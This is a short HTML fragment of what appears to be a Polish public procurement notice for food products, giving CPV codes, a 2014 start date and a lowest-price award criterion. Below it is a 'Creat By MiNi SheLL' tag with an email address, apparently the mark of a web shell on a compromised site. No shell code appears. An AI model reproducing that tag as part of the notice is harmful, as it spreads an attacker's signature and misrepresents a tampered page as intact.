<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.01.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com